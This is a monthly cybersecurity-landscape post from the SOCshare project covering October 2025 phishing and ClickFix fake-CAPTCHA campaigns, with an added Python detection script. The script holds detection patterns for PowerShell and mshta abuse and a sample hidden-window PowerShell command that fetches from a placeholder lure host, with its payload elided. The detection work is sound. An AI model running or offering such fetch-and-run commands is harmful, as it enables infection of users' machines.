SOCshare: cybersecurity landscape in October 2025


October 2025 saw continued escalation in social engineering attacks, particularly phishing. ClickFix attacks also remained among the top threats and were quite successful: a high number of infected users was observed.

Phishing attempts on the rise 

During October we repeatedly witnessed phishing attempts. Their content involved various techniques, from malware delivery to phishing links for credential harvesting. One thing stood out: more phishing e-mails now come from legitimate but compromised mailboxes. This helps attackers evade detection and spam filters.

ClickFix attacks 

ClickFix attacks remained present, active, and notably successful throughout October 2025, continuing to exploit user trust and habitual behavior. These campaigns mostly relied on fake Cloudflare CAPTCHA pages, which were used to create a false sense of legitimacy. Victims were typically instructed to “verify” access or “fix” an issue by clicking through the CAPTCHA, ultimately leading them to execute malicious commands. 

What Else Happened in October 2025? 

  1. Rise in cyber incidents across Europe and the Baltic countries. Estonia recorded 1057 incidents with an impact, which is higher than the average of the last six months.
  2. Lithuania hosted a national cybersecurity forum, where leaders and tech experts discussed increasing threats and deepened international cooperation.

Key takeaways

Phishing remains the dominant entry point
Phishing campaigns increasingly originate from legitimate but compromised mailboxes, which significantly improves attacker success rates by bypassing traditional spam filters and trust-based email defenses. Further training is required to keep users informed.
ClickFix attacks remain highly active
Given how effective these attacks are, there is a strong need to talk about them and to educate users not to fall for them.

Where to pay attention

Looking Ahead 

Organizations should focus on: 

  • Improving detection mechanisms for ClickFix-type attacks
  • Improving resilience through user training and education on how to recognize the tactics used by threat actors.
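
One way to approach the ClickFix detection recommended above, as an added example that is not SOCshare's own tooling: a triage function over process-creation events that flags script hosts started from the desktop shell with fake-verification wording or remote-fetch traits in the command line. The Run-dialog assumption, the Sysmon-style field names, the indicator list and the sample events are all assumptions or constructed data, not taken from the article.

```python
import re

# Assumption (not stated in the article): ClickFix pages have the victim paste a
# command into the Windows Run dialog, so the script host starts as a child of
# explorer.exe. Field names follow Sysmon Event ID 1 (process creation).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "curl.exe", "msiexec.exe"}
INDICATORS = {
    "lure_text": re.compile(r"captcha|not a robot|verif(y|ication)|cloudflare", re.I),
    "remote_url": re.compile(r"https?://", re.I),
    "hidden_window": re.compile(r"-w(indowstyle|in)?\s+hidden\b", re.I),
    "encoded_cmd": re.compile(r"\s-e(nc\w*)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def triage(event):
    """Return (severity, indicator names) for one process-creation event."""
    if basename(event["ParentImage"]) != "explorer.exe":
        return "none", []
    if basename(event["Image"]) not in SCRIPT_HOSTS:
        return "none", []
    hits = [name for name, rx in INDICATORS.items() if rx.search(event["CommandLine"])]
    if "lure_text" in hits and len(hits) >= 2:
        return "high", hits      # verification wording plus an execution trait
    return ("medium", hits) if hits else ("none", hits)

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
# Constructed sample events; the host is a placeholder and the payload is elided.
SAMPLE_EVENTS = [
    {"ParentImage": EXPLORER, "Image": PS,   # pasted fake-CAPTCHA "fix"
     "CommandLine": 'powershell -w hidden -c "<elided> https://lure.example.invalid/v" '
                    "# I am not a robot - Cloudflare verification ID 4821"},
    {"ParentImage": EXPLORER, "Image": PS,   # user opens a console normally
     "CommandLine": "powershell.exe"},
    {"ParentImage": r"C:\Program Files\Agent\agent.exe", "Image": PS,  # managed script
     "CommandLine": r"powershell.exe -File C:\Scripts\inventory.ps1"},
    {"ParentImage": EXPLORER, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://lure.example.invalid/check"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        severity, hits = triage(ev)
        print(f"{severity:6} {hits} {ev['CommandLine'][:60]}")
```

Because it keys on the parent process and command-line traits rather than a known-bad hash or domain, the check illustrates the behavioral detection the article contrasts with signatures and blacklists; the indicator patterns need tuning against an environment's own baseline.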

October 2025 showed how threat actors are innovating within familiar attack vectors like phishing while also diversifying their tactics with advanced malware capabilities. Traditional defenses based solely on signatures or blacklists are increasingly insufficient. 
Behavioral and contextual detection, combined with human awareness and regional cooperation, are now essential pillars of a resilient cybersecurity posture. 

References 

This entry is published as part of the SOCshare project (No. 101145843), which we are running together with Vilnius City Municipality. It is partly funded by the European Union. The views and opinions expressed are those of the authors alone and do not necessarily reflect those of the European Union or the European Cyber Security Centre of Excellence. Neither the European Union nor the European Cyber Security Centre of Excellence can be held responsible for them.
